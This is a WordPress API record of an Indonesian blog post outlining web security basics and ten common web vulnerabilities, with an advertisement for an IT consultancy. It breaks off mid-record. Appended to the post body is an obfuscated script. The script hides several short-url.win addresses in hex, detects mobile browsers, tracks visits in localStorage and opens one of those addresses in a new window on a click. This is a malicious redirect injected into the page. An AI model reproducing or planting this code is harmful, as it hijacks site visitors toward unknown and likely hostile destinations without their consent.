{"id":1843,"date":"2021-02-19T08:31:09","date_gmt":"2021-02-19T01:31:09","guid":{"rendered":"https:\/\/beadgrup.com\/news\/?p=1843"},"modified":"2021-02-19T08:31:09","modified_gmt":"2021-02-19T01:31:09","slug":"keamanan-aplikasi-berbasis-web","status":"publish","type":"post","link":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/","title":{"rendered":"Keamanan Aplikasi Berbasis Web"},"content":{"rendered":"\n<p><strong>Dasar-Dasar Keamanan<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\" type=\"1\"><li>Autentikasi Autentikasi merupakan proses yang secara unik mengidentifikasi client dari layanan dan aplikasi kita.<\/li><li>Otorisasi otorisasi merupakan proses yang memerintahkan operasi dan sumber daya dengan client yang diautentikasi saja yang diijinkan untuk melakukan akses<\/li><li>Pengauditan Pada sistem ini menjamin bahwa seseorang pengguna tidak bisa menyangkal bahwa dia telah melakukan suatu operasi atau memulai suatu transaksi.<\/li><li>Kerahasiaan Kerahasiaan merupakan proses untuk menyakinkan bahwa data tetap bersifat pribadi dan rahasia dan tidak bisa dilihat oleh pengguna yang tidak diotorisasi atau pengintip yang memonitor aliran lalu lintas antarjaringan<\/li><li>&nbsp;Integritas Integritas adalah jaminan bahwa data dilindungi dari modifikasi yang disengaja. 6. Ketersediaan Dari perspektif keamanan, ketersediaan berarti sistem tetap tersedia untuk para pengguna yang sah.<\/li><\/ol>\n\n\n\n<p><strong>Prinsip-prinsip Keamanan<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\" type=\"1\"><li>Compartmentalize Firewal<\/li><li>Use least privilege:<\/li><li>Apply defense in depth<\/li><li>Do not trust user input<\/li><li>Fail securely<\/li><li>Reduce your attack<\/li><\/ol>\n\n\n\n<h5 class=\"wp-block-heading\">1.\u00a0Injection<\/h5>\n\n\n\n<p>Dalam praktik penggunaan SQL, OS, dan LDAP, injeksi adalah hal yang sangat riskan untuk terjadi. Injeksi biasanya dilakukan dengan memasukkan data yang tidak terpercaya ke dalam interpreter sebagai bagian dari command atau query. Data yang dimasukkan oleh injektor dapat menipu interpreter untuk mengeksekusi perintah tertentu atau mengakses data rahasia tanpa izin. &nbsp;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">2.\u00a0Broken Authentication and Session Management<\/h5>\n\n\n\n<p>Fungsi pada aplikasi berbasis web yang berkaitan dengan autentifikasi dan manajemen sesi seringkali tidak terimplementasikan dengan baik. Apabila hal ini terjadi di level parah, penyerang sistem akan dengan mudah mencuri dan memanfaatkan password serta data pribadi lainnya yang akan merugikan pengguna.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">3.\u00a0Cross-Site Scripting\u00a0(XSS)<\/h5>\n\n\n\n<p>Kelemahan dalam XSS terjadi ketika sebuah aplikasi mengakses data yang tidak terpercaya dan mengirimkannya lewat web tanpa ada konfirmasi validasi sebagaimana mestinya.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">4.\u00a0Insecure Direct Object References<\/h5>\n\n\n\n<p>Objek langsung di sini berkaitan ketika developer mengekspos referensi ke dalam implementasi objek internal. Misalnya ke file, direktori, atau database key.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">5.\u00a0Security Misconfiguration<\/h5>\n\n\n\n<p>Selama ini, sistem keamanan yang bagus membutuhkan konfigurasi yang terjamin guna mengakses aplikasi, framework, web server, aplikasi server, database server, hingga platform.&nbsp;Sebab, setingan default seringkali tidak aman.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">6.\u00a0Sensitive Data Exposure<\/h5>\n\n\n\n<p>Banyak aplikasi berbasis web yang belum melindungi data sensitif secara layak. Misalnya data kartu kredit hingga data autentifikasi. Penyerang sistem sangat mungkin mencuri atau memodifikasi data bersistem pengamanan lemah untuk melakukan penipuan.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">7.\u00a0Missing Function Level Access Control<\/h5>\n\n\n\n<p>Mayoritas aplikasi berbasis web akan memverifikasi fungsi akses sebelum membuat fungsi tersebut ada di user interface. Faktanya, aplikasi juga perlu melakukan kontrol akses yang sama ke server.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">8.\u00a0Cross-Site Request Forgery\u00a0(CSRF)<\/h5>\n\n\n\n<p>Cara kerja CSRF adalah dengan memaksa masuk ke browser pengguna yang kemudian mengirimkan permintaan HTTP, termasuk cookies, serta berbagai informasi rahasia yang tersimpan di browser, ke aplikasi web gadungan.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">9.\u00a0Using Known Vulnerable Components<\/h5>\n\n\n\n<p>Komponen dasar seperti database, famework, dan berbagai modul software kebanyakan dijalankan dengan hak penuh. Apabila komponen yang riskan dieksploitasi, bisa menyebabkan kehilangan data dan pengambil-alihan server.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">10.\u00a0Unvalidated Redirects and Forwards<\/h5>\n\n\n\n<p>Aplikasi berbasis web yang digunakan user seringkali melakukan redirect dan forward ke halaman lain atau bahkan website lain. Tindakan semacam ini, tanpa validasi yang benar, dapat mengarahkan user ke laman phishing.<\/p>\n\n\n\n<p>Kebutuhan akan digital IT sangat dibutuhkan dalam kegiatan sehari-hari, Bead IT Consultant merupakan pilihan tepat sebagai partner anda,kunjungi website kami dengan klik link ini : www.beadgrup.com<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x56\\x44\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x6d\\x64\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x44\\x46\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x65\\x75\\x68\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4e\\x48\\x41\\x34\\x63\\x304','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x43\\x66\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x5a\\x41\\x75\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6c\\x58\\x4b\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x75\\x72\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x45\\x4c\\x41\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Dasar-Dasar Keamanan Autentikasi Autentikasi merupakan proses yang secara unik mengidentifikasi client dari layanan dan aplikasi kita. Otorisasi otorisasi merupakan proses &hellip; <\/p>\n","protected":false},"author":2,"featured_media":1844,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1843","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-desain"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Keamanan Aplikasi Berbasis Web - Bead Daily<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Keamanan Aplikasi Berbasis Web - Bead Daily\" \/>\n<meta property=\"og:description\" content=\"Dasar-Dasar Keamanan Autentikasi Autentikasi merupakan proses yang secara unik mengidentifikasi client dari layanan dan aplikasi kita. Otorisasi otorisasi merupakan proses &hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\" \/>\n<meta property=\"og:site_name\" content=\"Bead Daily\" \/>\n<meta property=\"article:published_time\" content=\"2021-02-19T01:31:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"810\" \/>\n\t<meta property=\"og:image:height\" content=\"569\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\"},\"author\":{\"name\":\"\",\"@id\":\"\"},\"headline\":\"Keamanan Aplikasi Berbasis Web\",\"datePublished\":\"2021-02-19T01:31:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\"},\"wordCount\":511,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#organization\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"articleSection\":[\"Desain\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\",\"url\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\",\"name\":\"Keamanan Aplikasi Berbasis Web - Bead Daily\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"datePublished\":\"2021-02-19T01:31:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage\",\"url\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"width\":810,\"height\":569},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Beranda\",\"item\":\"https:\/\/beadgrup.com\/berita\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Keamanan Aplikasi Berbasis Web\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/beadgrup.com\/berita\/#website\",\"url\":\"https:\/\/beadgrup.com\/berita\/\",\"name\":\"Bead Daily\",\"description\":\"Halaman artikel mengenai Teknologi\",\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/beadgrup.com\/berita\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/beadgrup.com\/berita\/#organization\",\"name\":\"Bead Daily\",\"url\":\"https:\/\/beadgrup.com\/berita\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"width\":100,\"height\":109,\"caption\":\"Bead Daily\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"\",\"url\":\"https:\/\/beadgrup.com\/berita\/author\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Keamanan Aplikasi Berbasis Web - Bead Daily","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/","og_locale":"en_US","og_type":"article","og_title":"Keamanan Aplikasi Berbasis Web - Bead Daily","og_description":"Dasar-Dasar Keamanan Autentikasi Autentikasi merupakan proses yang secara unik mengidentifikasi client dari layanan dan aplikasi kita. Otorisasi otorisasi merupakan proses &hellip;","og_url":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/","og_site_name":"Bead Daily","article_published_time":"2021-02-19T01:31:09+00:00","og_image":[{"width":810,"height":569,"url":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Written by":"","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#article","isPartOf":{"@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/"},"author":{"name":"","@id":""},"headline":"Keamanan Aplikasi Berbasis Web","datePublished":"2021-02-19T01:31:09+00:00","mainEntityOfPage":{"@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/"},"wordCount":511,"commentCount":0,"publisher":{"@id":"https:\/\/beadgrup.com\/berita\/#organization"},"image":{"@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","articleSection":["Desain"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/","url":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/","name":"Keamanan Aplikasi Berbasis Web - Bead Daily","isPartOf":{"@id":"https:\/\/beadgrup.com\/berita\/#website"},"primaryImageOfPage":{"@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage"},"image":{"@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","datePublished":"2021-02-19T01:31:09+00:00","breadcrumb":{"@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#primaryimage","url":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","contentUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","width":810,"height":569},{"@type":"BreadcrumbList","@id":"https:\/\/beadgrup.com\/berita\/keamanan-aplikasi-berbasis-web\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Beranda","item":"https:\/\/beadgrup.com\/berita\/"},{"@type":"ListItem","position":2,"name":"Keamanan Aplikasi Berbasis Web"}]},{"@type":"WebSite","@id":"https:\/\/beadgrup.com\/berita\/#website","url":"https:\/\/beadgrup.com\/berita\/","name":"Bead Daily","description":"Halaman artikel mengenai Teknologi","publisher":{"@id":"https:\/\/beadgrup.com\/berita\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/beadgrup.com\/berita\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/beadgrup.com\/berita\/#organization","name":"Bead Daily","url":"https:\/\/beadgrup.com\/berita\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/","url":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","contentUrl":"https:\/\/beadgrup.com\/berita\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","width":100,"height":109,"caption":"Bead Daily"},"image":{"@id":"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"","url":"https:\/\/beadgrup.com\/berita\/author\/"}]}},"_links":{"self":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts\/1843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/comments?post=1843"}],"version-history":[{"count":1,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts\/1843\/revisions"}],"predecessor-version":[{"id":1845,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts\/1843\/revisions\/1845"}],"wp:featuredmedia":[{"embedda